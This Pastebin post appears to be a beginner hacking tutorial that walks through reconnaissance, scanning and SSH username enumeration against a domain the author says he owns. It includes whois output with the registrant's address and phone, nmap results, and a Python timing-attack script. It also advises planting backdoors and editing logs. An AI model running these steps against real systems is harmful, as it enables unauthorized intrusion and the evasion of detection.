Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- A hacker can get his feet into a network via different techniques, and for different reasons. A network can be targeted from a hacker for what ever reason he has and in this case it will be a target of choice, or it could be just a target of opporunity as he found it by a random scan.
- -“If a network is not a target of choice it doesn't mean that it is safe, because its just a matter of time till it will become a target of opportunity.”-
- Usually hackers will go in these well known steps to gain access over a network,
- 1- Reconnaissance and Foot / Finger printing:- Mainly reconnaissance is the first step of an attack and this phase is mostly about Information gathering. All information that the hacker can gather about the victim even if it seems simple and useless. The hacker can collect this information via different ways, for example,simple dumpster diving around the target's office, checking their staff social network profiles, googling the target and note the information he will got or via Social engineering. The Foot printing process will come after to complete the step. Foot printing is mainly to study the network, for example, how devices are connected together, how many device the network have, infra structure, firewalls, etc.
- “This phase depend on OSINT -Open source intelligence- with no direct contact with the target”
- 2- Scanning:- The attacker will engage within the target for more specific details, for example open ports and running services, lets say we got port 21 open then by a simple telnet command we can figure the FTP version running in the server.
- 3-Enumeration, gaining access and privileges escalation:- Three different processes, firstly Enumeration which will allow the hacker to know the valid accounts that he wants to obtain access for via active connection, for example he knows for the above processes -Reconnaissance, foot printing and scanning- that there is a SSH service running on -default- port 22, via enumerating the hacker can know if a user is valid or not via simple python script. Next step will be reinforcing the valid account. If he succeed to gain an access to the SSH server, then he will try do privileges escalation, if the brute-forced account doesn't have super user power.
- 4- Creating a backdoor and covering tracks:- In this phase the hacker already gained access and he will install a rootkit, backdoor so he guarantee him self a free entrance to the network later on, for example, creating a new user and adding it to the sudo list. Last step will be covering the tracks by updating the logs via deleting his tracks from it.
- A hacker will never delete the logs, as it will get the network administrator attention.
- A real life example,
- Let's say a hacker would like to takeover ashellz.com -It's owned by me- I will try to demonstrate the process step by step according to the above explanation.
- Reconnaissance and Foot printing:-
- Using the command whois to collect public information about the target.
- root@Mox:/home/allamoox# whois ashellz.com
- Registrant domain : Goddady.com
- Tech Email: allamoox@hotmail.com
- Name Server: NS8015.HOSTGATOR.COM
- Name Server: NS8016.HOSTGATOR.COM
- Tech Name: mahmoud allam
- Tech Organization: aLLamoox
- Tech Street: aol tarik shobar
- Tech City: Tanta
- Tech State/Province: gHARBIA
- Tech Postal Code: 31111
- Tech Country: EG
- Tech Phone: +20.104691184
- root@Mox:/home/allamoox# dig ashellz.com any -Using dig with the switch any , to show all records.-
- ashellz.com. 14385 IN A 192.185.16.67
- ashellz.com. 86385 IN SOA ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com. 2016091826 86400 7200 3600000 86400
- ashellz.com. 14385 IN MX 0 mail.ashellz.com.
- ashellz.com. 14385 IN TXT "v=spf1 a mx include:websitewelcome.com ~all"
- ashellz.com. 86385 IN NS ns8016.hostgator.com.
- ashellz.com. 86385 IN NS ns8015.hostgator.com.
- Scanning:-
- Will use nmap with switches O to detect the OS and sS so the connection close before completing the three way handshake -Passive scan-.
- root@Mox:/home/allamoox# nmap -O -sS ashellz.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp filtered ssh
- 25/tcp filtered smtp
- 26/tcp open rsftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 135/tcp filtered msrpc
- 139/tcp filtered netbios-ssn
- 143/tcp open imap
- 443/tcp open https
- 445/tcp filtered microsoft-ds
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux 2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 - 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%)
- .
- root@Mox:/home/allamoox# telnet private.ashellz.com 22
- Trying 158.69.197.45...
- Connected to private.ashellz.com.
- Escape character is '^]'.
- SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6
- Simple search will let us know that this
- Enumeration:-
- The hacker at this point have a good idea about the target, and which parts are vulnerable and he will start enumerating valid accounts for the SSH service via timing attack technique.
- The technique here depend in the time that our server take to authenticate a user, so we will use a 10kb password to which means if the user doesn't exist then we will get answer from the server faster than an existing user.
- With this simple python script we will decide that our password is roughly 10KB and will enter the username we want manually.
- #Including the paramiko library
- import paramiko
- #Including the time library
- import time
- #Asking for the required username to be checked
- user=raw_input("user: ")
- #Supplying the Password as the letter A repeated 25000 times
- p='A'*25000 -define password as letter A repeated 25000 times-
- ssh = paramiko.SSHClient()
- starttime=time.clock()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- try:
- #Opening a SSH connection with the ashellz.com server with the user that we will chose with the big #25000 letter password
- ssh.connect('192.185.16.67', username=user,
- password=p)
- #Giving the token time to authenticate an user
- except:
- endtime=time.clock()
- total=endtime-starttime
- print(total)
- “
- Now we get few valid accounts such as (root, allamoox, allam, test)
- |gaining access and privileges escalation
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement